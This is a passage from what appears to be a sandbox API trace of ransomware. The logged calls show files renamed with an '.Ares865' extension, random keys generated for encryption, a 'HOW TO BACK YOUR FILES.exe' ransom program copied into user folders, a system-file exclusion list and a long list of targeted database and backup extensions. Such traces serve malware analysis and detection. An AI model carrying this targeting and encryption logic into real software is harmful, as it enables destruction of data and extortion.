(lpString="Ares865") returned 7 [0041.766] lstrcmpiW (lpString1="KNS.DTD", lpString2="Ares865") returned 1 [0041.766] lstrlenW (lpString=".dll") returned 4 [0041.766] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".dll") returned 1 [0041.766] lstrlenW (lpString=".lnk") returned 4 [0041.766] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".lnk") returned 1 [0041.766] lstrlenW (lpString=".ini") returned 4 [0041.766] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".ini") returned 1 [0041.766] lstrlenW (lpString=".sys") returned 4 [0041.766] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".sys") returned 1 [0041.767] lstrlenW (lpString="WMSDKNS.DTD") returned 11 [0041.767] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="WMSDKNS.XML" | out: lpString1="WMSDKNS.XML") returned="WMSDKNS.XML" [0041.767] lstrlenW (lpString="WMSDKNS.XML") returned 11 [0041.767] lstrlenW (lpString="Ares865") returned 7 [0041.767] lstrcmpiW (lpString1="KNS.XML", lpString2="Ares865") returned 1 [0041.767] lstrlenW (lpString=".dll") returned 4 [0041.767] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2=".dll") returned 1 [0041.767] lstrlenW (lpString=".lnk") returned 4 [0041.767] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2=".lnk") returned 1 [0041.767] lstrlenW (lpString=".ini") returned 4 [0041.767] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2=".ini") returned 1 [0041.767] lstrlenW (lpString=".sys") returned 4 [0041.767] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2=".sys") returned 1 [0041.767] lstrlenW (lpString="WMSDKNS.XML") returned 11 [0041.767] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.Ares865") returned 85 [0041.767] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows media\\12.0\\wmsdkns.xml"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows media\\12.0\\wmsdkns.xml.ares865"), dwFlags=0x1) returned 1 [0041.778] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows media\\12.0\\wmsdkns.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0041.778] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=10191) returned 1 [0041.778] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0041.779] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb400 [0041.779] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0041.779] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0041.781] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0041.781] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0041.781] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2ad0, lpName=0x0) returned 0x12c [0041.782] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2ad0) returned 0x1a0000 [0041.786] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0041.786] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0041.786] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0041.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb478 [0041.786] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb478 | out: hHeap=0x2b0000) returned 1 [0041.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cba28 [0041.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0041.787] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0041.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0041.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cba28 [0041.787] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0041.787] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0041.787] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0041.787] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0041.787] CloseHandle (hObject=0x12c) returned 1 [0041.787] CloseHandle (hObject=0x164) returned 1 [0041.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb400 | out: hHeap=0x2b0000) returned 1 [0041.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0041.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0041.789] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf9269464, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x27cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMSDKNS.XML", cAlternateFileName="")) returned 0 [0041.789] FindClose (in: hFindFile=0x2cd0a8 | out: hFindFile=0x2cd0a8) returned 1 [0041.789] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2428 [0041.789] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail" [0041.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0041.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0041.789] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail") returned 59 [0041.789] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail" [0041.789] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.789] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.804] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.804] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a7dc1e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a7dc1e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0041.805] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.805] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.805] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.805] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a7dc1e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a7dc1e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.805] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.805] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.805] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.805] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.805] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6535940, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6535940, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf67dcad6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x5e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", cAlternateFileName="ACCOUN~3.OEA")) returned 1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="aoldtz.exe") returned -1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".") returned 1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="..") returned 1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="windows") returned -1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="bootmgr") returned -1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="temp") returned -1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="pagefile.sys") returned -1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="boot") returned -1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="ids.txt") returned -1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="ntuser.dat") returned -1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="perflogs") returned -1 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="MSBuild") returned -1 [0041.805] lstrlenW (lpString="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 55 [0041.805] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\*") returned 61 [0041.805] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" | out: lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" [0041.805] lstrlenW (lpString="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 55 [0041.805] lstrlenW (lpString="Ares865") returned 7 [0041.805] lstrcmpiW (lpString1="account", lpString2="Ares865") returned -1 [0041.805] lstrlenW (lpString=".dll") returned 4 [0041.805] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".dll") returned 1 [0041.805] lstrlenW (lpString=".lnk") returned 4 [0041.806] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".lnk") returned 1 [0041.806] lstrlenW (lpString=".ini") returned 4 [0041.806] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".ini") returned 1 [0041.806] lstrlenW (lpString=".sys") returned 4 [0041.806] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".sys") returned 1 [0041.806] lstrlenW (lpString="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 55 [0041.806] lstrlenW (lpString="bak") returned 3 [0041.806] lstrcmpiW (lpString1="unt", lpString2="bak") returned 1 [0041.806] lstrlenW (lpString="ba_") returned 3 [0041.806] lstrcmpiW (lpString1="unt", lpString2="ba_") returned 1 [0041.806] lstrlenW (lpString="dbb") returned 3 [0041.806] lstrcmpiW (lpString1="unt", lpString2="dbb") returned 1 [0041.806] lstrlenW (lpString="vmdk") returned 4 [0041.806] lstrcmpiW (lpString1="ount", lpString2="vmdk") returned -1 [0041.806] lstrlenW (lpString="rar") returned 3 [0041.806] lstrcmpiW (lpString1="unt", lpString2="rar") returned 1 [0041.806] lstrlenW (lpString="zip") returned 3 [0041.806] lstrcmpiW (lpString1="unt", lpString2="zip") returned -1 [0041.806] lstrlenW (lpString="tgz") returned 3 [0041.806] lstrcmpiW (lpString1="unt", lpString2="tgz") returned 1 [0041.806] lstrlenW (lpString="vbox") returned 4 [0041.806] lstrcmpiW (lpString1="ount", lpString2="vbox") returned -1 [0041.806] lstrlenW (lpString="vdi") returned 3 [0041.806] lstrcmpiW (lpString1="unt", lpString2="vdi") returned -1 [0041.806] lstrlenW (lpString="vhd") returned 3 [0041.806] lstrcmpiW (lpString1="unt", lpString2="vhd") returned -1 [0041.806] lstrlenW (lpString="vhdx") returned 4 [0041.806] lstrcmpiW (lpString1="ount", lpString2="vhdx") returned -1 [0041.806] lstrlenW (lpString="avhd") returned 4 [0041.806] lstrcmpiW (lpString1="ount", lpString2="avhd") returned 1 [0041.806] lstrlenW (lpString="db") returned 2 [0041.806] lstrcmpiW (lpString1="nt", lpString2="db") returned 1 [0041.806] lstrlenW (lpString="db2") returned 3 [0041.806] lstrcmpiW (lpString1="unt", lpString2="db2") returned 1 [0041.807] lstrlenW (lpString="db3") returned 3 [0041.807] lstrcmpiW (lpString1="unt", lpString2="db3") returned 1 [0041.807] lstrlenW (lpString="dbf") returned 3 [0041.807] lstrcmpiW (lpString1="unt", lpString2="dbf") returned 1 [0041.807] lstrlenW (lpString="mdf") returned 3 [0041.807] lstrcmpiW (lpString1="unt", lpString2="mdf") returned 1 [0041.807] lstrlenW (lpString="mdb") returned 3 [0041.807] lstrcmpiW (lpString1="unt", lpString2="mdb") returned 1 [0041.807] lstrlenW (lpString="sql") returned 3 [0041.807] lstrcmpiW (lpString1="unt", lpString2="sql") returned 1 [0041.807] lstrlenW (lpString="sqlite") returned 6 [0041.807] lstrcmpiW (lpString1="ccount", lpString2="sqlite") returned -1 [0041.807] lstrlenW (lpString="sqlite3") returned 7 [0041.807] lstrcmpiW (lpString1="account", lpString2="sqlite3") returned -1 [0041.807] lstrlenW (lpString="sqlitedb") returned 8 [0041.807] lstrcmpiW (lpString1="eaccount", lpString2="sqlitedb") returned -1 [0041.807] lstrlenW (lpString="xml") returned 3 [0041.807] lstrcmpiW (lpString1="unt", lpString2="xml") returned -1 [0041.807] lstrlenW (lpString="$er") returned 3 [0041.807] lstrcmpiW (lpString1="unt", lpString2="$er") returned 1 [0041.807] lstrlenW (lpString="4dd") returned 3 [0041.807] lstrcmpiW (lpString1="unt", lpString2="4dd") returned 1 [0041.807] lstrlenW (lpString="4dl") returned 3 [0041.807] lstrcmpiW (lpString1="unt", lpString2="4dl") returned 1 [0041.807] lstrlenW (lpString="^^^") returned 3 [0041.807] lstrcmpiW (lpString1="unt", lpString2="^^^") returned 1 [0041.807] lstrlenW (lpString="abs") returned 3 [0041.807] lstrcmpiW (lpString1="unt", lpString2="abs") returned 1 [0041.807] lstrlenW (lpString="abx") returned 3 [0041.807] lstrcmpiW (lpString1="unt", lpString2="abx") returned 1 [0041.807] lstrlenW (lpString="accdb") returned 5 [0041.807] lstrcmpiW (lpString1="count", lpString2="accdb") returned 1 [0041.807] lstrlenW (lpString="accdc") returned 5 [0041.807] lstrcmpiW (lpString1="count", lpString2="accdc") returned 1 [0041.807] lstrlenW (lpString="accde") returned 5 [0041.808] lstrcmpiW (lpString1="count", lpString2="accde") returned 1 [0041.808] lstrlenW (lpString="accdr") returned 5 [0041.808] lstrcmpiW (lpString1="count", lpString2="accdr") returned 1 [0041.808] lstrlenW (lpString="accdt") returned 5 [0041.808] lstrcmpiW (lpString1="count", lpString2="accdt") returned 1 [0041.808] lstrlenW (lpString="accdw") returned 5 [0041.808] lstrcmpiW (lpString1="count", lpString2="accdw") returned 1 [0041.808] lstrlenW (lpString="accft") returned 5 [0041.808] lstrcmpiW (lpString1="count", lpString2="accft") returned 1 [0041.808] lstrlenW (lpString="adb") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="adb") returned 1 [0041.808] lstrlenW (lpString="adb") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="adb") returned 1 [0041.808] lstrlenW (lpString="ade") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="ade") returned 1 [0041.808] lstrlenW (lpString="adf") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="adf") returned 1 [0041.808] lstrlenW (lpString="adn") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="adn") returned 1 [0041.808] lstrlenW (lpString="adp") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="adp") returned 1 [0041.808] lstrlenW (lpString="alf") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="alf") returned 1 [0041.808] lstrlenW (lpString="ask") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="ask") returned 1 [0041.808] lstrlenW (lpString="btr") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="btr") returned 1 [0041.808] lstrlenW (lpString="cat") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="cat") returned 1 [0041.808] lstrlenW (lpString="cdb") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="cdb") returned 1 [0041.808] lstrlenW (lpString="ckp") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="ckp") returned 1 [0041.808] lstrlenW (lpString="cma") returned 3 [0041.808] lstrcmpiW (lpString1="unt", lpString2="cma") returned 1 [0041.809] lstrlenW (lpString="cpd") returned 3 [0041.809] lstrcmpiW (lpString1="unt", lpString2="cpd") returned 1 [0041.809] lstrlenW (lpString="dacpac") returned 6 [0041.809] lstrcmpiW (lpString1="ccount", lpString2="dacpac") returned -1 [0041.809] lstrlenW (lpString="dad") returned 3 [0041.809] lstrcmpiW (lpString1="unt", lpString2="dad") returned 1 [0041.809] lstrlenW (lpString="dadiagrams") returned 10 [0041.809] lstrcmpiW (lpString1=".oeaccount", lpString2="dadiagrams") returned -1 [0041.809] lstrlenW (lpString="daschema") returned 8 [0041.809] lstrcmpiW (lpString1="eaccount", lpString2="daschema") returned 1 [0041.809] lstrlenW (lpString="db-journal") returned 10 [0041.809] lstrcmpiW (lpString1=".oeaccount", lpString2="db-journal") returned -1 [0041.809] lstrlenW (lpString="db-shm") returned 6 [0041.809] lstrcmpiW (lpString1="ccount", lpString2="db-shm") returned -1 [0041.809] lstrlenW (lpString="db-wal") returned 6 [0041.809] lstrcmpiW (lpString1="ccount", lpString2="db-wal") returned -1 [0041.809] lstrlenW (lpString="dbc") returned 3 [0041.809] lstrcmpiW (lpString1="unt", lpString2="dbc") returned 1 [0041.809] lstrlenW (lpString="dbs") returned 3 [0041.809] lstrcmpiW (lpString1="unt", lpString2="dbs") returned 1 [0041.809] lstrlenW (lpString="dbt") returned 3 [0041.809] lstrcmpiW (lpString1="unt", lpString2="dbt") returned 1 [0041.809] lstrlenW (lpString="dbv") returned 3 [0041.809] lstrcmpiW (lpString1="unt", lpString2="dbv") returned 1 [0041.809] lstrlenW (lpString="dbx") returned 3 [0041.809] lstrcmpiW (lpString1="unt", lpString2="dbx") returned 1 [0041.809] lstrlenW (lpString="dcb") returned 3 [0041.809] lstrcmpiW (lpString1="unt", lpString2="dcb") returned 1 [0041.809] lstrlenW (lpString="dct") returned 3 [0041.809] lstrcmpiW (lpString1="unt", lpString2="dct") returned 1 [0041.809] lstrlenW (lpString="dcx") returned 3 [0041.809] lstrcmpiW (lpString1="unt", lpString2="dcx") returned 1 [0041.809] lstrlenW (lpString="ddl") returned 3 [0041.809] lstrcmpiW (lpString1="unt", lpString2="ddl") returned 1 [0041.809] lstrlenW (lpString="dlis") returned 4 [0041.809] lstrcmpiW (lpString1="ount", lpString2="dlis") returned 1 [0041.810] lstrlenW (lpString="dp1") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="dp1") returned 1 [0041.810] lstrlenW (lpString="dqy") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="dqy") returned 1 [0041.810] lstrlenW (lpString="dsk") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="dsk") returned 1 [0041.810] lstrlenW (lpString="dsn") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="dsn") returned 1 [0041.810] lstrlenW (lpString="dtsx") returned 4 [0041.810] lstrcmpiW (lpString1="ount", lpString2="dtsx") returned 1 [0041.810] lstrlenW (lpString="dxl") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="dxl") returned 1 [0041.810] lstrlenW (lpString="eco") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="eco") returned 1 [0041.810] lstrlenW (lpString="ecx") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="ecx") returned 1 [0041.810] lstrlenW (lpString="edb") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="edb") returned 1 [0041.810] lstrlenW (lpString="epim") returned 4 [0041.810] lstrcmpiW (lpString1="ount", lpString2="epim") returned 1 [0041.810] lstrlenW (lpString="fcd") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="fcd") returned 1 [0041.810] lstrlenW (lpString="fdb") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="fdb") returned 1 [0041.810] lstrlenW (lpString="fic") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="fic") returned 1 [0041.810] lstrlenW (lpString="flexolibrary") returned 12 [0041.810] lstrcmpiW (lpString1="C}.oeaccount", lpString2="flexolibrary") returned -1 [0041.810] lstrlenW (lpString="fm5") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="fm5") returned 1 [0041.810] lstrlenW (lpString="fmp") returned 3 [0041.810] lstrcmpiW (lpString1="unt", lpString2="fmp") returned 1 [0041.810] lstrlenW (lpString="fmp12") returned 5 [0041.810] lstrcmpiW (lpString1="count", lpString2="fmp12") returned -1 [0041.811] lstrlenW (lpString="fmpsl") returned 5 [0041.811] lstrcmpiW (lpString1="count", lpString2="fmpsl") returned -1 [0041.811] lstrlenW (lpString="fol") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="fol") returned 1 [0041.811] lstrlenW (lpString="fp3") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="fp3") returned 1 [0041.811] lstrlenW (lpString="fp4") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="fp4") returned 1 [0041.811] lstrlenW (lpString="fp5") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="fp5") returned 1 [0041.811] lstrlenW (lpString="fp7") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="fp7") returned 1 [0041.811] lstrlenW (lpString="fpt") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="fpt") returned 1 [0041.811] lstrlenW (lpString="frm") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="frm") returned 1 [0041.811] lstrlenW (lpString="gdb") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="gdb") returned 1 [0041.811] lstrlenW (lpString="gdb") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="gdb") returned 1 [0041.811] lstrlenW (lpString="grdb") returned 4 [0041.811] lstrcmpiW (lpString1="ount", lpString2="grdb") returned 1 [0041.811] lstrlenW (lpString="gwi") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="gwi") returned 1 [0041.811] lstrlenW (lpString="hdb") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="hdb") returned 1 [0041.811] lstrlenW (lpString="his") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="his") returned 1 [0041.811] lstrlenW (lpString="ib") returned 2 [0041.811] lstrcmpiW (lpString1="nt", lpString2="ib") returned 1 [0041.811] lstrlenW (lpString="idb") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="idb") returned 1 [0041.811] lstrlenW (lpString="ihx") returned 3 [0041.811] lstrcmpiW (lpString1="unt", lpString2="ihx") returned 1 [0041.811] lstrlenW (lpString="itdb") returned 4 [0041.812] lstrcmpiW (lpString1="ount", lpString2="itdb") returned 1 [0041.812] lstrlenW (lpString="itw") returned 3 [0041.812] lstrcmpiW (lpString1="unt", lpString2="itw") returned 1 [0041.812] lstrlenW (lpString="jet") returned 3 [0041.812] lstrcmpiW (lpString1="unt", lpString2="jet") returned 1 [0041.812] lstrlenW (lpString="jtx") returned 3 [0041.812] lstrcmpiW (lpString1="unt", lpString2="jtx") returned 1 [0041.812] lstrlenW (lpString="kdb") returned 3 [0041.812] lstrcmpiW (lpString1="unt", lpString2="kdb") returned 1 [0041.812] lstrlenW (lpString="kexi") returned 4 [0041.812] lstrcmpiW (lpString1="ount", lpString2="kexi") returned 1 [0041.812] lstrlenW (lpString="kexic") returned 5 [0041.812] lstrcmpiW (lpString1="count", lpString2="kexic") returned -1 [0041.812] lstrlenW (lpString="kexis") returned 5 [0041.812] lstrcmpiW (lpString1="count", lpString2="kexis") returned -1 [0041.812] lstrlenW (lpString="lgc") returned 3 [0041.812] lstrcmpiW (lpString1="unt", lpString2="lgc") returned 1 [0041.812] lstrlenW (lpString="lwx") returned 3 [0041.812] lstrcmpiW (lpString1="unt", lpString2="lwx") returned 1 [0041.812] lstrlenW (lpString="maf") returned 3 [0041.812] lstrcmpiW (lpString1="unt", lpString2="maf") returned 1 [0041.812] lstrlenW (lpString="maq") returned 3 [0041.812] lstrcmpiW (lpString1="unt", lpString2="maq") returned 1 [0041.812] lstrlenW (lpString="mar") returned 3 [0041.812] lstrcmpiW (lpString1="unt", lpString2="mar") returned 1 [0041.812] lstrlenW (lpString="marshal") returned 7 [0041.812] lstrcmpiW (lpString1="account", lpString2="marshal") returned -1 [0041.812] lstrlenW (lpString="mas") returned 3 [0041.812] lstrcmpiW (lpString1="unt", lpString2="mas") returned 1 [0041.812] lstrlenW (lpString="mav") returned 3 [0041.812] 